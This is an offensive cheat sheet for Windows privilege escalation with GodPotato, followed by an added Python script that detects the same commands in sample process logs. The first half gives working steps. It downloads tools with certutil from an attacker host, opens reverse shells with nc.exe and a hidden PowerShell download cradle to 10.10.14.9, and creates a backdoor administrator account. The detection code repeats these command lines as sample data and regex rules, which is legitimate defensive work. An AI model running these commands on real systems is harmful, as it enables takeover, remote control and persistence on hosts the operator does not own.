Check the .NET Framework version (GodPotato ships builds for specific .NET versions)

```powershell
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
```

Transfer `GodPotato` from the attacker's Kali box to the target host

```powershell
certutil -urlcache -split -f http://<attacker-ip>/GodPotato.exe gp.exe
```

Basic test (confirm SYSTEM)

```powershell
.\gp.exe -cmd "whoami"
.\gp.exe -cmd "cmd.exe /c whoami /all > C:\Users\merlin\Desktop\god.txt"
type C:\Users\merlin\Desktop\god.txt
```

Reverse shell 1 - `nc.exe`

```powershell
# transfer nc.exe
certutil -urlcache -split -f http://<attacker-IP>/nc64.exe nc.exe

# test
.\nc.exe <attacker-IP> 80 -e C:\Windows\system32\cmd.exe

# via GodPotato
.\gp.exe -cmd ".\nc.exe <attacker-IP> 80 -e C:\Windows\System32\cmd.exe"
```

Reverse shell 2

```powershell
# attacker
rlwrap nc -lvnp 4444

# target
.\GodPotato.exe -cmd "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444"
```

Create an Administrator user

```powershell
GodPotato.exe -cmd "net user wook P@ssw0rd! /add"
GodPotato.exe -cmd "net localgroup administrators wook /add"
```
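As an added defender-side example (not part of the original cheat sheet), the following Python script runs detection rules derived from the commands above over constructed process-creation records. The pipe-delimited record format, the sample events and the parent-process allowlist are assumptions made for the illustration.

```python
import re

# Constructed sample process-creation records (modelled loosely on the
# fields of Windows event 4688: subject user | parent image | command line).
# These are made-up lines for the example, not real telemetry.
SAMPLE_EVENTS = [
    "merlin|powershell.exe|certutil -urlcache -split -f http://10.10.14.9/GodPotato.exe gp.exe",
    "merlin|powershell.exe|.\\gp.exe -cmd \"whoami\"",
    "NT AUTHORITY\\SYSTEM|gp.exe|cmd.exe /c whoami /all > C:\\Users\\merlin\\Desktop\\god.txt",
    "NT AUTHORITY\\SYSTEM|gp.exe|powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1')",
    "NT AUTHORITY\\SYSTEM|gp.exe|net user wook P@ssw0rd! /add",
    "NT AUTHORITY\\SYSTEM|gp.exe|net localgroup administrators wook /add",
    "merlin|powershell.exe|.\\nc.exe 10.10.14.9 80 -e C:\\Windows\\system32\\cmd.exe",
    "alice|explorer.exe|notepad.exe C:\\notes.txt",
    "svc_backup|services.exe|certutil -hashfile C:\\backup.zip SHA256",
]

# Command-line rules derived from the commands in this cheat sheet.
RULES = [
    ("certutil_download", re.compile(r"certutil.*-urlcache.*https?://", re.I)),
    ("local_user_added", re.compile(r"\bnet\s+user\s+\S+.*\s/add\b", re.I)),
    ("admin_group_change", re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("hidden_ps_download_cradle", re.compile(r"powershell.*-w\s+hidden.*(DownloadString|IEX)", re.I)),
    ("netcat_exec_shell", re.compile(r"\bnc(64)?\.exe\b.*\s-e\s+\S*cmd\.exe", re.I)),
]
# Parents under which a SYSTEM process is normally expected (simplified, assumed allowlist).
EXPECTED_SYSTEM_PARENTS = {"services.exe", "svchost.exe", "wininit.exe", "winlogon.exe", "lsass.exe"}

def parse_event(line):
    user, parent, cmdline = line.split("|", 2)  # maxsplit keeps '|' inside the command line
    return {"user": user, "parent": parent, "cmdline": cmdline}

def classify(event):
    """Return the rule names that fire for one parsed event."""
    hits = [name for name, rx in RULES if rx.search(event["cmdline"])]
    # Potato-style abuse hands a low-privileged user's child process a SYSTEM
    # token, so SYSTEM running under an unexpected parent is its own signal.
    if (event["user"].upper() == "NT AUTHORITY\\SYSTEM"
            and event["parent"].lower() not in EXPECTED_SYSTEM_PARENTS):
        hits.append("system_from_unexpected_parent")
    return hits

def detect(lines):
    """Return [(rule, cmdline)] for every event that matches at least one rule."""
    return [(rule, ev["cmdline"])
            for ev in map(parse_event, lines) for rule in classify(ev)]

if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

In production the same rules would be applied to 4688 or Sysmon event 1 data, where the full command line is only present if command-line auditing is enabled.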